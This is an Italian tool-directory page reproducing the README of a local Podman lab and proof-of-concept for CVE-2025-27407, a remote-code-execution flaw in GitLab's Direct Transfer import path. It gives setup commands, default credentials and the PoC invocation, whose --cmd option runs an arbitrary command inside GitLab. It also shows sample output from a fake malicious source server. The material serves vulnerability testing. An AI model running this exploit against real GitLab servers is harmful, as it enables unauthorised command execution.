Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-27407 — Lab locale ed exploit proof-of-concept per CVE-2025-27407, che mira al caricatore dello schema GraphQL introspection di GitLab tramite il percorso HTTP Direct Transfer. Include ambiente containerizzato e script di attivazione automatica. | Kitploit
Strumenti/GitHubGitHub/logggg2402/cve-2025-27407
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

Lab locale ed exploit proof-of-concept per CVE-2025-27407, che mira al caricatore dello schema GraphQL introspection di GitLab tramite il percorso HTTP Direct Transfer. Include ambiente containerizzato e script di attivazione automatica.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-27407 GitLab Podman Lab

Laboratorio minimale solo locale per dimostrare che il percorso HTTP Direct Transfer di GitLab raggiunge il caricatore di schema di introspezione vulnerabile di graphql-ruby. Il laboratorio esegue un singolo container GitLab CE vulnerabile; lo script PoC avvia il suo server GitLab sorgente fittizio in-process solo durante il test.

Esegui questo solo su sistemi che possiedi o per cui hai ricevuto esplicita autorizzazione al test.

File

FileScopo
lab.shAvvia, attende, verifica e pulisce il laboratorio GitLab.
poc_host_port_cmd.pyPoC monouso: server sorgente fittizio + trigger di login/configurazione/importazione GitLab.

Requisiti

  • Host Linux con podman
  • curl
  • Porte locali libere per GitLab e per il server sorgente fittizio del PoC
  • RAM/disco sufficienti per il container GitLab Omnibus

Valori predefiniti:

ElementoPredefinito
Immagine GitLabdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
Container GitLabcve-27407-gitlab
Rete Podmancve-2025-27407-net
Utente root GitLabroot
Password root GitLabCve27407Password!
Marker/tmp/cve_2025_27407_gitlab_marker

Avvia il Laboratorio

La porta 8080 è quella predefinita dello script. Se qualcos'altro la sta già usando, usa 18080 come mostrato qui.

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

Apri GitLab all'indirizzo:

root@kitploit:~
http://127.0.0.1:18080

Credenziali di accesso:

root@kitploit:~
root / Cve27407Password!

root è solo l'utente di default del laboratorio. Il trigger del PoC non richiede un account amministratore; qualsiasi utente autenticato che possa creare/importare in un namespace di destinazione può colpire il percorso Direct Transfer vulnerabile. Usa --username e --password per testare con un utente non amministratore.

Esegui il PoC

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

Segnali attesi:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

Opzioni

OpzioneScopoPredefinito
--hostHost GitLab da colpireObbligatorio
--portPorta HTTP GitLab da colpireObbligatorio
--cmdComando eseguito nel runtime GitLabtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portPorta locale del server sorgente fittizio8001
--wait-secondsTempo per mantenere attivo il server sorgente fittizio per i worker GitLab asincroni90
--usernameNome utente GitLabroot
--passwordPassword GitLabCve27407Password!

Override delle Variabili d'Ambiente

VariabileScopoPredefinito
GITLAB_HTTP_PORTPorta HTTP GitLab host/container8080
GITLAB_SSH_PORTPorta SSH GitLab host2224
GITLAB_ROOT_PASSWORDPassword root inizialeCve27407Password!
GITLAB_IMAGEImmagine GitLab da eseguiredocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKNome rete Podmancve-2025-27407-net
MARKERFile controllato all'interno del container GitLab/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDSTimeout di attesa per la prontezza1200

Risoluzione dei problemi

  • Se 8080 è occupata, usa GITLAB_HTTP_PORT=18080 per ./lab.sh up.
  • Se il PoC non riesce a associare la sua porta sorgente, cambia --listen-port con una porta non utilizzata.
  • Se la verifica del marker entra in competizione con il worker di importazione in background, aumenta --wait-seconds o ri-esegui MARKER="$MARKER" ./lab.sh verify.
  • Se GitLab non è ancora pronto, ri-esegui GITLAB_HTTP_PORT=18080 ./lab.sh wait.
  • Se un laboratorio precedente è bloccato, esegui ./lab.sh cleanup e ricomincia.

Pulizia

root@kitploit:~
./lab.sh cleanup

Questo rimuove il container GitLab, eventuali container sorgente fittizi legacy di versioni precedenti del laboratorio e la rete del laboratorio. Non rimuove le immagini Podman scaricate.

Scarica lo strumento